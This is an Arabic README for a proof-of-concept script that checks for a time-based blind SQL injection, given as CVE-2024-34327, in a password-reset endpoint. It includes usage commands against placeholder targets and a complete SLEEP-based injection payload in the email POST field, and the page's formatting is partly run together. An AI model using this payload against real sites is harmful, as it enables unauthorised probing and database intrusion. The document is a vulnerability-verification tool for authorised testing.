
مدقق إثبات مفهوم لحقن SQL أعمى قائم على الوقت في password-reset-token.php؛ يرسل طلبات POST مصممة ويكتشف الاستجابات المتأخرة لـ CVE-2024-34327.
هذا السكربت (V-24-02-001_SQLi_Check.py) هو أداة إثبات مفهوم (PoC) للتحقق من وجود ثغرة حقن SQL أعمى قائمة على الوقت تؤثر على نقطة النهاية password-reset-token.php، والمعروفة باسم CVE-2024-34327.
هذه الأداة مخصصة لأغراض تعليمية واختبار مصرح به فقط. الفحص أو الاستغلال غير المصرح به للأنظمة دون موافقة هو عمل غير قانوني وغير أخلاقي.
/auth/password-reset-token.phpemail في بيانات POSTSLEEP() لقياس التأخير في استجابة الخادمPHPSESSID لكل تشغيلةrequests (pip install requests)python3 V-24-02-001_SQLi_Check.py --url https://target-domain.com
python3 V-24-02-001_SQLi_Check.py --url https://vulnerable-site.com
[+] VULNERABLE إذا تجاوز تأخير استجابة الخادم 9 ثوانٍ[-] NOT VULNERABLE خلاف ذلكdata[email][email protected]'+AND+(SELECT+8161+FROM+(SELECT(SLEEP(10)))uvHC)+AND+'abcd'='abcd
requests في PythonUser-Agent و Referer واقعيينأنت مسؤول عن استخدام هذه الأداة بشكل أخلاقي. المؤلف لا يتحمل أي مسؤولية عن أي إساءة استخدام.
باحث أمني – [اسمك أو اسمك المستعار]
لا تتردد في المساهمة أو الإبلاغ عن المشكلات.